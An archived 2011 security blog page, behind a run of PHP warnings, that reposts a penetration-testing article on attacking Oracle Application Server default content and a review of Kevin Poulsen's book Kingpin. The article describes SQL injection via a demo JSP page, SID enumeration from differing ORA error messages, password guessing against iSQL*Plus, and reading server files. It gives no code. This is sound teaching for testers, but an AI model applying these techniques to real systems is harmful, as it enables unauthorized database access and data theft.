Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 164

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 167

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 170

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 173

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 176

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 178

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 180

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 202

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 206

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 224

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 225

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 227

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/admin/class.options.metapanel.php on line 56

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/admin/class.options.metapanel.php on line 49
15 | October | 2011 | Certified Ethical Hackers Security Analyst Malware Hacking Information
From the daily archives: Saturday, October 15, 2011

oracle_airplane_in_web.jpgBy Chris Gates, CISSP, GCIH, C|EH, CPTS

Oracle applications are not what you’d call simple.  I think any DBA or Oracle Application Server Administrator will be the first to attest to that fact.  Oracle, with its great products, comes with some un-pleasantries.  These are:

1. Oracle applications are complicated (hopefully we all agree on this).
2. They come with loads of default content and no clear way to remove that content.  There is no IISLockdown equivalent for Oracle applications.  Content you don’t want must be removed manually.  Some of this content can be used to run database queries, read documents, gather information via information leakage on the pages or perform XSS attacks.
3. Users have to pay for patches and extended advisory information (even then, no Proof of Concept code is released by Oracle).
4. And lastly, you have a fairly complicated patch/upgrade process which leads to an “it’s working, don’t touch it” mentality by a fair amount of admins.

This provides a target rich environment for pentesters and bad guys. Let’s take a look.

Active Image
Active Image del.icio.us

Discuss in Forums

Discuss Topic (4)

One of the issues that used to frequently come up on my penetration tests was running into random Oracle content pages.  Here are some examples of default oracle pages (that don’t actually have anything useful) that appear often, because they are the index pages.

Oracle HTTP Server Index Page

Oracle Application Server Portal Index Page

Obvious questions immediately come up when you discover pages like this.  These include what default content/components exist, how do I find it, and more importantly how do I leverage this content to further penetrate into the network.

On public facing servers we may catch a break and use Google and Bing hacking [www.red-database-security.com/wp/google_oracle_hacking_us.pdf ] to find some of those useful content/components.  This is of no help to us internally though as internal servers won’t be indexed.

A couple of default content scanners exist out in the world. Oapscan comes to mind, Inguma has one built-in, nikto has some oracle checks, etc.  The problem I kept running into was that I would give a 200 for some random URL, but I’d have no idea what it did, what it was for, or how to exploit it. No fun.

In the end I used a combination of almost all the checks contained in various scanners that I could find and made a Metasploit auxiliary module out of them.  I also added a “vuln” field to that output which would give me (and hopefully follow-on contributors) the ability to give some insight into why that URL was vulnerable or a reference on how to exploit it.


The idea is that, as we find documents in the oracle web application, we get a clue as to why that can be useful.  A couple of the more useful pieces of default content found by our scan are below.



Based on the results of our oracle_oas_scan.rb script, we see that /demo/sql/jdbc/JDBCQuery.jsp is vulnerable to SQL Injection and allows us query information from the oracle instance.


SQL Injection in JDBQQuery.jsp and the Result Showing the Oracle SID Name

Example 2


The oracle_oas_scanner searches for this useful piece of default content.  This page allows us to run arbitrary SQL queries.

Oracle Demo Page

Example 3


iSQL*Plus is a web interface to the TNS Listener. You log in with a username/password/database SID, and you are given a text box in which you can run sql commands, just like you were logged into the sqlplus interface.

iSQL*Plus Login Page for Oracle DB 9 R2

Logged into iSQL*Plus

Hopefully the value of the interface is shining through by now.  Now the issue of any website that requires authentication is how to guess the credentials or bypass them.

Bring in isqlplus_sidbrute.rb and isqlplus_login.rb. 

If you remember from the hacking oracle via the TNS listener material [ http://www.slideshare.net/chrisgates/attacking-oracle-with-the-metasploit-framework  http://www.youtube.com/watch?v=Hj7u8Ja-mPM ] , we need 4 things to connect and log into an oracle instance:  IP, port, usernames/password, and database SID.  In the case of iSQL*Plus IP port are taken care of. Since it is a web application, we’ve obviously found the page.  All that’s left is username/password and SID.

Luckily for us the application responds differently for incorrect usernames/password with the right SID and incorrect usernames/passwords with the wrong SID.  This allows us to throw password guessing for the SID field in the application.

Using error messages returned by Oracle determines valid SID:

Wrong SID:
ORA-12154: TNS: could not resolve service name

Right SID (wrong password):
ORA-01017: invalid username/password; logon denied

As an added bonus, iSQL*Plus authenticates by default to the first SID in the tnsnames.ora file.  This means we can *usually* pass no SID, and it will try to auth to the top SID in the tnsnames.ora file.

Isqlplus_sidbrute in Action

Once we have a valid SID, or know that the application allows us to pass a blank SID in the POST request, we can repeat the process to guess valid username/password combinations.

Isqlplus_login in Action

Once valid credentials are obtained you can login to the interface and run SQL commands to extract data or attempt privilege escalation attacks against the database and/or conduct further post exploitation activities against the database server.

Or for added lolz, you can read random files off the server:

Reading Arbitrary Files from the Host

Output of the File

That’s it for now.  Enjoy using vendor created content to dig further into the network!

To get a copy or contribute to the code mentioned in the article, grab it on github through carnal0wnage https://github.com/carnal0wnage/carnal0wnage-code and in the Web eXploitation Framework https://github.com/WebExploitationFramework.

Article source: http://www.ethicalhacker.net/content/view/363/24/

Tagged with:

kingpin_bookcover.jpgReview by RichM

Kevin Poulsen has worked tirelessly to become a respected expert in the information security field and is a senior editor for Wired Magazine. Kevin edits the Threat Level Blog covering various topics mostly intersecting between law enforcement and hacking, but there are other relevant posts like the latest goings on with Wikileaks. The now white hat was not always on the straight and narrow and made a name for himself as his alter ego, “Dark Dante.”

The legend of his “exploits” is well known and has him counted amongst America’s most infamous hackers. Dark Dante’s most impressive hack was when he used his phreaking skills to win a Porsche 944. He rigged the phone lines of an LA radio station, guaranteeing he would be their 102nd caller! Kevin Poulsen and Max Butler, the person on whom the book is based, have many similarities. Both are very skilled and have a natural ability, but while one was able to find legitimate work after a conviction, the other was not. It is because of Kevin’s past that he can bring to life such a fascinating topic. Most mainstream reporters would (at best) turn this story into a 5-page magazine article, whereas Mr. Poulsen has created a suspenseful page-turner in Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground.

Active Image
Active Image del.icio.us

Discuss in Forums

Discuss Topic (2)


butler.jpgMax Butler (pictured on the right) is and was an idealist that simply wanted to help others. The problem is, he never recognized when he had gone too far, until, as they say, it was too late. One day while doing research he discovered a vulnerability in the Berkeley Internet Name Domain (BIND) Server. At first he was content to see others find it and report it, but once a weaponized version was found in the wild, Max felt a duty to act. He began patching every vulnerable machine that he could access. While this seemed like a benevolent act, Max also patched computers owned by the United States government and military. This was the end of Max Butler and any shot at a legitimate career in Information Security.

Once released, Max tried to find work in the private sector. His reputation was too far gone, and no one would even take a chance on him for minimum wage! It was at this point that Max realized the only way he could make money was in the carding world. He quickly climbed the food chain, first on someone else’s site, then eventually his own. In a quest for power, he single-handedly swallowed the competition and became the only “reputable” site for stolen identities.

“Kingpin” is a 360 degree view of everything that was taking place in the carding community, before it was ever even something most people knew about. This book is a blow-by-blow account of all the dark secrets of how this world operated, the main players involved and what law enforcement did to shatter this world. It is also a frightening glimpse into the power that corporations had to keep breaches a secret. All the while millions of their customers’ personal information went on auction in the black market, and the victims had no idea.

Consumers were lead to believe that in the beginning of the 21st century, the major threat to our personal identity was online; however, as you learn in Kingpin, the real threat was complacency on the part of the FBI (in not releasing names of compromised corporations) and the companies themselves for allowing their Point of Sales (POS) Systems to have little to no security. These machines continued to house data that they were not supposed to, and as such consumers who didn’t even own a computer fell victim to identity theft through the gross negligence of brick and mortar operations.

Kingpin is a fascinating book, since, as an outsider to this world, I never had a great understanding of how carders operated. Throughout the book, it is apparent that there is no honor among thieves, and those that should be the most “trusted” are either back-dooring their customers and stealing whatever they can download or informing LE in an effort to either eliminate competition or reduce a sentence that is already pending. Another great feature of Kingpin is that it serves as a timeline of some of the most important/crucial occurrences in information security. In addition to covering some of the more high profile criminal cases it also shows well known exploits that were being leveraged with reckless abandon such as the Real VNC 4.1.1 vulnerability. I remember this exploit all too well as my department worked tirelessly to ensure that we took all necessary precautions to mitigate this vulnerability.

poulsen_sm.jpgFinal Thoughts

If there was anything negative about the book, it is the lack of explanation of the various exploits, trojans and backdoors used by Max and his friends to own the carding world. Although there is some technical information including a brief explanation of PGP, this book gives a wider view of the world of identity and credit card theft. Knowing that the desired audience is broader than just us geeks, it is understandable, yet the lack of some more hacking details is still disappointing.

That being said, Kingpin by Kevin Poulsen (pictured on the right) is a great book and one of those you have trouble putting down. It is amazing that everything in the book is factual and not some piece of fiction. Kingpin joins the quickly growing list of InfoSec books that are accessible to the outside world.

Article source: http://www.ethicalhacker.net/content/view/364/2/

Tagged with:
Set your Twitter account name in your settings to use the TwitterBar Section.